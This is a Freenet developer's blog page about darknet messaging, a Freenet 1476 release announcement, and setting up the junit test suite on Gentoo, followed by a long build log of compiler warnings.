The link “Connect to your friends” shows how to connect via darknet and communicate via darknet N2N messages (node-to-node messages). From my understanding, these are currently one of the most secure communication methods we can get, because they hide our personal communication beneath Freenet traffic.

They aren’t suited to communicating anonymously (because we can only talk with our friends), but they are well suited to communicating confidentially.

PS: The image is licensed under GPL, copyright: the freenet team (for the rabbit) and Arne Babenhauserheide. It uses the source images Zuchineee (thanks to Arthurcravan prrrr!) and National Security Agency from the public domain. See the sources below. … but you know what: Just share it anyway you like. I’m sure the author of the rabbit agrees, and I for sure do ☺

PPS: Yes, I had lots of fun creating this ;-)

PPPS: For some reason, the image disappeared from my server. I did not take it down. Yes, that worries me. What you see above is served from an in-proxy into Freenet. Should that go down, too, you can still use Freenet to access the image or setup your own in-proxy to allow others to see it.

AnhangGröße
freenet-protects-your-dickpic-vs-nsa.gif659.81 KB
freenet-protects-your-dickpic-vs-nsa.png126.31 KB
freenet-protects-your-dickpic-vs-nsa.xcf2.54 MB

Freenet release 1476 brings convenient, privacy-preserving publishing

With build 1476, the Freenet Project introduces convenient privacy-preserving publishing by shipping the latest release of Sharesite, a tool for managing multiple single-page web sites within Freenet. Additional changes include better security against malicious image files, usability improvements and optimization.

Freenet Logo (bunny)

The Freenet Project team announced the newest version of its censorship prevention suite on March 8th 2017. This release provides easy, privacy-preserving publishing in the darknet without the need for a server. By loading the Sharesite plugin, users can publish multiple simple websites with just a few clicks. These sites get stored decentrally within Freenet so they stay available after the user goes offline. Like all other content in Freenet they can then be accessed anonymously and users can opt-in to receive a notification in the Freenet web interface when a website they watch gets updated.

When accessing content Freenet provides many precautions against accidental de-anonymization. One of these features is protection against media files which could spill the users address or exploit security problems in browsers. This release tightens these protections for the common gif image files by detecting and removing potentially dangerous data in these files, for example comments which could be interpreted as instructions for the browser.

The new release is available for Windows, OS X, and GNU/Linux. It can be downloaded for free from https://freenetproject.org.

About Freenet:

Freenet is free open source software and has been under constant development in the Freenet Project since 2000. The mission of Freenet is to realize the technical aspect of censorship resistance. Its unique set of features includes a decentralized, global friend-to-friend publishing structure (the darknet mode), access dependent content lifetime, decentralized spam resistance, stable pseudonyms, and hosting without a server.

Contact information:

Multimedia:

Additional information:

2017-03-08-freenet-sites

2017-03-08-freenet-connections-0-4-4

2017-03-08-freenet-sharesite-0-4-4_1

2017-03-08-freenet-sharesite-0-4-4_2

2017-03-08-freenet-sharesite-0-4-4_3

I finally got the Freenet junit testsuite to run on Gentoo

Blindfolded Dog1

For years I developed Freenet partially blindfolded, because I could not get the tests to actually run on my Gentoo box.

As of today, that’s finally over: The testsuite runs successfully. My setup is still unclean, but it finally works. No more asking other contributors to run the tests for me.

To reproduce:

  1. Install Freenet and its dependencies via Gentoo: emerge freenet
  2. Install bouncycastle 1.54: emerge =dev-java/bcprov-1.54
  3. Symlink all ant-stuff into ~/.ant/lib: mkdir -p ~/.ant/lib; cd ~/.ant/lib; for i in $(find /usr/share/ant*/lib/ -name '*jar' | xargs); ln -s $i; done
  4. Get the fred repository (freenet reference daemon) from https://github.com/freenet/fred
  5. Put a file named override.properties with the following content into the fred folder:
lib.contrib.get = true
lib.dir = /usr/share
lib.jars = bcprov-1.54/lib/bcprov.jar
bc.jar = lib/bcprov.jar
libtest.dir = /usr/share
# to really ensure that ant finds junit: mkdir -p ~/.ant/lib; cd ~/.ant/lib; for i in $(find /usr/share/ant*/lib/ -name '*jar' | xargs); ln -s $i; done
# all the ant-* libs are found via cd /usr/share; find ant*/lib/ -name '*jar' | xargs
libtest.jars = freenet/lib/ant.jar hamcrest-core-1.3/lib/hamcrest-core.jar junit/lib/junit.jar junit-4/lib/junit.jar ant-antlr/lib/ant-antlr.jar ant-apache-bcel/lib/ant-apache-bcel.jar ant-apache-bsf/lib/ant-apache-bsf.jar ant-apache-log4j/lib/ant-apache-log4j.jar ant-apache-oro/lib/ant-apache-oro.jar ant-apache-regexp/lib/ant-apache-regexp.jar ant-apache-resolver/lib/ant-apache-resolver.jar ant-apache-xalan2/lib/ant-apache-xalan2.jar ant-commons-logging/lib/ant-commons-logging.jar ant-commons-net/lib/ant-commons-net.jar ant-contrib/lib/ant-contrib.jar ant-core/lib/ant-bootstrap.jar ant-core/lib/ant.jar ant-core/lib/ant-launcher.jar ant-eclipse-ecj-4.4/lib/ant-eclipse-ecj.jar ant-javamail/lib/ant-javamail.jar ant-jdepend/lib/ant-jdepend.jar ant-jsch/lib/ant-jsch.jar ant-junit/lib/ant-junit.jar ant/lib/ant-junit.jar ant/lib/ant-jsch.jar ant/lib/ant-apache-resolver.jar ant/lib/ant-commons-net.jar ant/lib/ant-javamail.jar ant/lib/ant-bootstrap.jar ant/lib/ant-swing.jar ant/lib/ant-apache-regexp.jar ant/lib/ant.jar ant/lib/ant-launcher.jar ant/lib/ant-jdepend.jar ant/lib/ant-apache-bcel.jar ant/lib/ant-nodeps.jar ant/lib/ant-trax.jar ant/lib/ant-apache-bsf.jar ant/lib/ant-apache-xalan2.jar ant/lib/ant-antlr.jar ant/lib/ant-commons-logging.jar ant/lib/ant-apache-log4j.jar ant/lib/ant-apache-oro.jar antlr-3/lib/antlr-tool.jar antlr-3/lib/antlr-runtime.jar antlr/lib/antlr.jar ant-nodeps/lib/ant-nodeps.jar ant-swing/lib/ant-swing.jar ant-trax/lib/ant-trax.jar

(Putting all the jars into the libtest is certainly overkill. Maybe I’ll trim this down at some point. But right now I’m happy that this finally works, so I’m going to celebrate it a bit and defer the cleanup for later ☺)

Happy Hacking!

PS: And here’s a complete build log:

ant clean >/dev/null; ant
Buildfile: /home/arne/fred-work/build.xml

init:
    [mkdir] Created dir: /home/arne/fred-work/build/main
    [mkdir] Created dir: /home/arne/fred-work/dist
    [mkdir] Created dir: /home/arne/fred-work/build/test
    [mkdir] Created dir: /home/arne/fred-work/run

env:

ensure-ext:

libdep-bc:

ensure-bc:

env-gjs:

ensure-gjs:

dep:

check-version-file:

build-version-file:
     [copy] Copying 1 file to /home/arne/fred-work/build/main/freenet/node
     [echo] Updated build version to @unknown@ in build/main/freenet/node/Version.java

build:
    [javac] Compiling 1080 source files to /home/arne/fred-work/build/main
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientGetWorkerThread.java:29: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ContainerInserter.java:37: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/async/InsertCompressor.java:24: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/async/SingleFileFetcher.java:51: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/async/SingleFileStreamGenerator.java:16: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/filter/CSSTokenizerFilter.java:23: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/filter/CSSReadFilter.java:23: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/filter/PNGFilter.java:25: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/clients/fcp/AddPeer.java:29: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/clients/fcp/FCPPluginClientMessage.java:13: warning: [deprecation] PluginTalker in freenet.pluginmanager has been deprecated
    [javac] import freenet.pluginmanager.PluginTalker;
    [javac]                             ^
    [javac] /home/arne/fred-work/src/freenet/clients/fcp/FilterMessage.java:22: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/clients/http/QueueToadlet.java:89: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/clients/http/ConnectionsToadlet.java:51: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/clients/http/HTTPRequestImpl.java:39: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/clients/http/WelcomeToadlet.java:38: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/config/WrapperConfig.java:18: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/crypt/JceLoader.java:16: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/crypt/SHA256.java:50: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/crypt/SSL.java:44: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/crypt/Yarrow.java:31: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/l10n/ISO639_3.java:13: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/node/simulator/LongTermMHKTest.java:35: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/node/simulator/LongTermManySingleBlocksTest.java:39: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/pluginmanager/PluginDownLoaderOfficialHTTPS.java:25: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/support/compress/Bzip2Compressor.java:19: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/support/compress/DecompressorThreadManager.java:24: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/support/compress/GzipCompressor.java:14: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/support/compress/NewLZMACompressor.java:20: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/support/compress/OldLZMACompressor.java:19: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/support/plugins/helpers1/AbstractFCPHandler.java:10: warning: [deprecation] PluginReplySender in freenet.pluginmanager has been deprecated
    [javac] import freenet.pluginmanager.PluginReplySender;
    [javac]                             ^
    [javac] /home/arne/fred-work/src/freenet/tools/CleanupTranslations.java:16: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.Closer;
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/client/ArchiveContext.java:18: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]  * WARNING: Changing non-transient members on classes that are Serializable can result in 
    [javac]                                                                           ^
    [javac] /home/arne/fred-work/src/freenet/support/Logger.java:88: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                         Closer.close(br);
    [javac]                         ^
    [javac] /home/arne/fred-work/src/freenet/support/Logger.java:101: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                     Closer.close(is);
    [javac]                     ^
    [javac] /home/arne/fred-work/src/freenet/client/FailureCodeTracker.java:24: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]  * WARNING: Changing non-transient members on classes that are Serializable can result in 
    [javac]                                           ^
    [javac] /home/arne/fred-work/src/freenet/client/async/TooManyFilesInsertException.java:5: warning: [serial] serializable class TooManyFilesInsertException has no definition of serialVersionUID
    [javac] public class TooManyFilesInsertException extends Exception {
    [javac]        ^
    [javac] /home/arne/fred-work/src/freenet/support/SimpleFieldSet.java:962: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                         Closer.close(br);
    [javac]                         ^
    [javac] /home/arne/fred-work/src/freenet/support/SimpleFieldSet.java:963: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                         Closer.close(isr);
    [javac]                         ^
    [javac] /home/arne/fred-work/src/freenet/support/SimpleFieldSet.java:964: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                         Closer.close(bis);
    [javac]                         ^
    [javac] /home/arne/fred-work/src/freenet/support/io/StorageFormatException.java:6: warning: [serial] serializable class StorageFormatException has no definition of serialVersionUID
    [javac] public class StorageFormatException extends Exception {
    [javac]        ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientContext.java:35: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.TempBucketFactory;
    [javac]                    ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientContext.java:35: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac] import freenet.support.io.TempBucketFactory;
    [javac]                     ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientContext.java:48: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]     private transient ClientRequestScheduler sskFetchSchedulerRT;
    [javac]                                                   ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientContext.java:218: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]             }, NativeThread.NORM_PRIORITY);
    [javac]                            ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientContext.java:245: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]             }, NativeThread.NORM_PRIORITY);
    [javac]                            ^
    [javac] /home/arne/fred-work/src/freenet/support/io/ResumeFailedException.java:3: warning: [serial] serializable class ResumeFailedException has no definition of serialVersionUID
    [javac] public class ResumeFailedException extends Exception {
    [javac]        ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientRequestScheduler.java:55: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]     private final RequestStarter starter;
    [javac]                            ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientRequestScheduler.java:49: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]     private final OfferedKeysList offeredKeys;
    [javac]                ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientRequestScheduler.java:157: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                 getter.internalError(e, this, clientContext, persistent);
    [javac]                  ^
    [javac] /home/arne/fred-work/src/freenet/node/useralerts/UserAlertManager.java:34: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]     private long lastUpdated;
    [javac]                    ^
    [javac] /home/arne/fred-work/src/freenet/node/useralerts/UserAlertManager.java:84: warning: [deprecation] queue(FCPMessage) in FCPConnectionOutputHandler has been deprecated
    [javac]                     subscriber.outputHandler.queue(alert.getFCPMessage());
    [javac]                                             ^
    [javac] /home/arne/fred-work/src/freenet/node/useralerts/UserAlertManager.java:382: warning: [deprecation] queue(FCPMessage) in FCPConnectionOutputHandler has been deprecated
    [javac]                         subscriber.outputHandler.queue(alert.getFCPMessage());
    [javac]                                                 ^
    [javac] /home/arne/fred-work/src/freenet/client/ArchiveManager.java:337: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                             Closer.close(is);
    [javac]                             ^
    [javac] /home/arne/fred-work/src/freenet/client/ArchiveManager.java:364: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(is);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/client/ArchiveManager.java:449: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(tarIS);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/support/io/TempBucketFactory.java:149: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                             Closer.close(is);
    [javac]                             ^
    [javac] /home/arne/fred-work/src/freenet/support/io/TempBucketFactory.java:354: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                     Closer.close(currentIS);
    [javac]                     ^
    [javac] /home/arne/fred-work/src/freenet/support/io/TempBucketFactory.java:419: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                     Closer.close(currentIS);
    [javac]                     ^
    [javac] /home/arne/fred-work/src/freenet/support/io/TempBucketFactory.java:452: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]                 Closer.close(os);
    [javac]                 ^
    [javac] /home/arne/fred-work/src/freenet/client/async/USKManager.java:65: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]     /** Latest SSK slot known to be by the author by blanked-edition-number USK */
    [javac]                            ^
    [javac] /home/arne/fred-work/src/freenet/client/async/USKManager.java:35: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]  * Tracks the latest version of every known USK.
    [javac]                          ^
    [javac] /home/arne/fred-work/src/freenet/support/compress/RealCompressor.java:115: warning: [deprecation] MIN_PRIORITY in NativeThread has been deprecated
    [javac]             return new NativeThread(r, "Compressor thread", NativeThread.MIN_PRIORITY, true);
    [javac]                                                                         ^
    [javac] /home/arne/fred-work/src/freenet/client/async/DatastoreChecker.java:81: warning: [rawtypes] found raw type: ArrayDeque
    [javac]         queue = new ArrayDeque[priorities];
    [javac]                     ^
    [javac]   missing type arguments for generic class ArrayDeque<E>
    [javac]   where E is a type-variable:
    [javac]     E extends Object declared in class ArrayDeque
    [javac] /home/arne/fred-work/src/freenet/client/async/DatastoreChecker.java:211: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]                 }, NativeThread.NORM_PRIORITY);
    [javac]                                ^
    [javac] /home/arne/fred-work/src/freenet/client/async/DatastoreChecker.java:230: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]         return NativeThread.NORM_PRIORITY;
    [javac]                            ^
    [javac] /home/arne/fred-work/src/freenet/support/MemoryLimitedJobRunner.java:35: warning: [rawtypes] found raw type: ArrayDeque
    [javac]         this.jobs = new ArrayDeque[priorities];
    [javac]                         ^
    [javac]   missing type arguments for generic class ArrayDeque<E>
    [javac]   where E is a type-variable:
    [javac]     E extends Object declared in class ArrayDeque
    [javac] /home/arne/fred-work/src/freenet/clients/fcp/ClientRequest.java:390: warning: [deprecation] HIGH_PRIORITY in NativeThread has been deprecated
    [javac]         }, NativeThread.HIGH_PRIORITY);
    [javac]                        ^
    [javac] /home/arne/fred-work/src/freenet/clients/fcp/ClientRequest.java:396: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]                     return NativeThread.NORM_PRIORITY;
    [javac]                                        ^
    [javac] /home/arne/fred-work/src/freenet/client/Metadata.java:1237: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(dos);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/client/Metadata.java:1238: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(cos);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/client/Metadata.java:1699: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(dos);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/client/InsertContext.java:300: warning: [dep-ann] deprecated item is not annotated with @Deprecated
    [javac]     public void onResume() {
    [javac]                 ^
    [javac] /home/arne/fred-work/src/freenet/client/async/PersistentJobRunnerImpl.java:32: warning: [deprecation] HIGH_PRIORITY in NativeThread has been deprecated
    [javac]     static final int WRITE_AT_PRIORITY = NativeThread.HIGH_PRIORITY-1;
    [javac]                                                      ^
    [javac] /home/arne/fred-work/src/freenet/client/async/PersistentJobRunnerImpl.java:103: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]             queueInternal(job, NativeThread.NORM_PRIORITY);
    [javac]                                            ^
    [javac] /home/arne/fred-work/src/freenet/client/async/PersistentJobRunnerImpl.java:113: warning: [deprecation] NORM_PRIORITY in NativeThread has been deprecated
    [javac]             queue(job, NativeThread.NORM_PRIORITY);
    [javac]                                    ^
    [javac] /home/arne/fred-work/src/freenet/client/async/PersistenceDisabledException.java:3: warning: [serial] serializable class PersistenceDisabledException has no definition of serialVersionUID
    [javac] public class PersistenceDisabledException extends Exception {
    [javac]        ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientGetter.java:395: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(dataInput);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientGetter.java:396: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(dataOutput);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/client/async/ClientGetter.java:397: warning: [deprecation] Closer in freenet.support.io has been deprecated
    [javac]             Closer.close(output);
    [javac]             ^
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:35: warning: [unchecked] unchecked cast
    [javac]         grabClients = (T[]) new Object[0];
    [javac]                             ^
    [javac]   required: T[]
    [javac]   found:    Object[]
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:36: warning: [rawtypes] found raw type: RemoveRandomWithObject
    [javac]         grabArrays = new RemoveRandomWithObject[0];
    [javac]                          ^
    [javac]   missing type arguments for generic class RemoveRandomWithObject<T>
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in interface RemoveRandomWithObject
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:36: warning: [unchecked] unchecked conversion
    [javac]         grabArrays = new RemoveRandomWithObject[0];
    [javac]                      ^
    [javac]   required: RemoveRandomWithObject<T>[]
    [javac]   found:    RemoveRandomWithObject[]
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:69: warning: [unchecked] unchecked cast
    [javac]         else return (C) grabArrays[idx];
    [javac]                                   ^
    [javac]   required: C
    [javac]   found:    RemoveRandomWithObject<T>
    [javac]   where T,C are type-variables:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac]     C extends RemoveRandomWithObject<T> declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:233: warning: [rawtypes] found raw type: RemoveRandomWithObject
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[0];
    [javac]                                        ^
    [javac]   missing type arguments for generic class RemoveRandomWithObject<T>
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in interface RemoveRandomWithObject
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:233: warning: [unchecked] unchecked cast
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[0];
    [javac]                                    ^
    [javac]   required: C[]
    [javac]   found:    RemoveRandomWithObject[]
    [javac]   where C,T are type-variables:
    [javac]     C extends RemoveRandomWithObject<T> declared in class SectoredRandomGrabArray
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:234: warning: [unchecked] unchecked cast
    [javac]                 grabClients = (T[]) new Object[0];
    [javac]                                     ^
    [javac]   required: T[]
    [javac]   found:    Object[]
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:238: warning: [rawtypes] found raw type: RemoveRandomWithObject
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[] { grabArrays[1-x] };
    [javac]                                        ^
    [javac]   missing type arguments for generic class RemoveRandomWithObject<T>
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in interface RemoveRandomWithObject
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:238: warning: [unchecked] unchecked cast
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[] { grabArrays[1-x] };
    [javac]                                    ^
    [javac]   required: C[]
    [javac]   found:    RemoveRandomWithObject[]
    [javac]   where C,T are type-variables:
    [javac]     C extends RemoveRandomWithObject<T> declared in class SectoredRandomGrabArray
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:239: warning: [unchecked] unchecked cast
    [javac]                 grabClients = (T[]) new Object[] { grabClients[1-x] };
    [javac]                                     ^
    [javac]   required: T[]
    [javac]   found:    Object[]
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:270: warning: [rawtypes] found raw type: RemoveRandomWithObject
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[] { grabArrays[1-x] };
    [javac]                                        ^
    [javac]   missing type arguments for generic class RemoveRandomWithObject<T>
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in interface RemoveRandomWithObject
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:270: warning: [unchecked] unchecked cast
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[] { grabArrays[1-x] };
    [javac]                                    ^
    [javac]   required: C[]
    [javac]   found:    RemoveRandomWithObject[]
    [javac]   where C,T are type-variables:
    [javac]     C extends RemoveRandomWithObject<T> declared in class SectoredRandomGrabArray
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:271: warning: [unchecked] unchecked cast
    [javac]                 grabClients = (T[]) new Object[] { grabClients[1-x] };
    [javac]                                     ^
    [javac]   required: T[]
    [javac]   found:    Object[]
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:291: warning: [rawtypes] found raw type: RemoveRandomWithObject
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[0];
    [javac]                                        ^
    [javac]   missing type arguments for generic class RemoveRandomWithObject<T>
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in interface RemoveRandomWithObject
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:291: warning: [unchecked] unchecked cast
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[0];
    [javac]                                    ^
    [javac]   required: C[]
    [javac]   found:    RemoveRandomWithObject[]
    [javac]   where C,T are type-variables:
    [javac]     C extends RemoveRandomWithObject<T> declared in class SectoredRandomGrabArray
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:292: warning: [unchecked] unchecked cast
    [javac]                 grabClients = (T[]) new Object[0];
    [javac]                                     ^
    [javac]   required: T[]
    [javac]   found:    Object[]
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:295: warning: [rawtypes] found raw type: RemoveRandomWithObject
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[] { grabArrays[x] }; // don't use RGA, it may be nulled out
    [javac]                                        ^
    [javac]   missing type arguments for generic class RemoveRandomWithObject<T>
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in interface RemoveRandomWithObject
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:295: warning: [unchecked] unchecked cast
    [javac]                 grabArrays = (C[]) new RemoveRandomWithObject[] { grabArrays[x] }; // don't use RGA, it may be nulled out
    [javac]                                    ^
    [javac]   required: C[]
    [javac]   found:    RemoveRandomWithObject[]
    [javac]   where C,T are type-variables:
    [javac]     C extends RemoveRandomWithObject<T> declared in class SectoredRandomGrabArray
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:296: warning: [unchecked] unchecked cast
    [javac]                 grabClients = (T[]) new Object[] { grabClients[x] };
    [javac]                                     ^
    [javac]   required: T[]
    [javac]   found:    Object[]
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in class SectoredRandomGrabArray
    [javac] /home/arne/fred-work/src/freenet/support/SectoredRandomGrabArray.java:324: warning: [rawtypes] found raw type: RemoveRandomWithObject
    [javac]             grabArrays = (C[]) new RemoveRandomWithObject[0];
    [javac]                                    ^
    [javac]   missing type arguments for generic class RemoveRandomWithObject<T>
    [javac]   where T is a type-variable:
    [javac]     T extends Object declared in interface RemoveRandomWithObject
